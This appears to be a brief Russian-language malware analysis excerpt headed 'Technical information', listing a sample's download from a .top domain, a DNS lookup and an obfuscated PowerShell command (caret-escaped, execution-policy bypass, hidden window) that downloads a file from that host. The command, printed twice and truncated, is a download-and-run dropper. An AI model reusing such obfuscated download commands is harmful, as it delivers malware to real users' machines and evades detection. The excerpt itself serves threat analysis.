Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWERShEll.eXE ^-^E^xeC^u^TIo^n^P^oL^IcY By^p^ASS -noP^r^OFI^le ^-wInD^oW^st^yLe ^hiDd^eN^ ^(^neW-O^bje^Ct^ ^SYs^TEm^.^Net^.webClI^ent).^D^OwNloAdFI^Le('http://www.fapoergol...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "PoWERShEll.eXE ^-^E^xeC^u^TIo^n^P^oL^IcY By^p^ASS -noP^r^OFI^le ^-wInD^oW^st^yLe ^hiDd^eN^ ^(^neW-O^bje^Ct^ ^SYs^TEm^.^Net^.webClI^ent).^D^OwNloAdFI^Le('http://www.fapoergol...' (со скрытым окном)